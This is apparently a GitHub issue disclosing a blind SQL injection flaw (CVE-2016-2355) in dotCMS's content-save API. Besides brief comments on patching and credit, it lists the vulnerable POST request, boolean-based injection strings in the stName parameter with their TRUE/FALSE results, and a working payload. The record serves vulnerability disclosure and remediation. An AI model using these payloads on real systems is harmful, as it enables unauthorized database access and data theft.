SQL Injection Vulnerability (CVE-2016-2355) #8848
Comments
May I ask whether this vulnerability currently has any new progress?
This issue is in the process of being patched for release.
CERT has assigned CVE-2016-2355 to this issue.
Hello, can you update the credit in http://dotcms.com/security/SI-35?
oarrietadotcms added a commit that referenced this issue Apr 18, 2016
Attack details
url: http://localhost:8080/api/content/save/1
postdata: address1=e&address2=e&city=e&contactMe=false&email=sample%40email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus
URL encoded POST input stName was set to -1' OR 3*2*1=6 AND 00053=00053 or 'cFbN0pEu'='
Tests performed:
-1' OR 2+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => TRUE
-1' OR 3+53-53-1=0+0+0+1 or 'cFbN0pEu'=' => FALSE
-1' OR 3*2<(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 3*2>(0+5+53-53) or 'cFbN0pEu'=' => FALSE
-1' OR 2+1-1-1=1 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 00053=00053 AND 3+1-1-1=1 or 'cFbN0pEu'=' => FALSE
-1' OR 3*2=5 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3*2=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
-1' OR 3*2*0=6 AND 00053=00053 or 'cFbN0pEu'=' => FALSE
-1' OR 3*2*1=6 AND 00053=00053 or 'cFbN0pEu'=' => TRUE
Original value: RequestProspectus
Parameter: stName (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: address1=e&address2=e&city=e&contactMe=false&email=sample@email.tst&firstName=e&fund=Growth&ipAddress=127.0.0.1&lastName=e&state=e&stName=RequestProspectus' AND 6745=6745 AND 'ajDn'='ajDn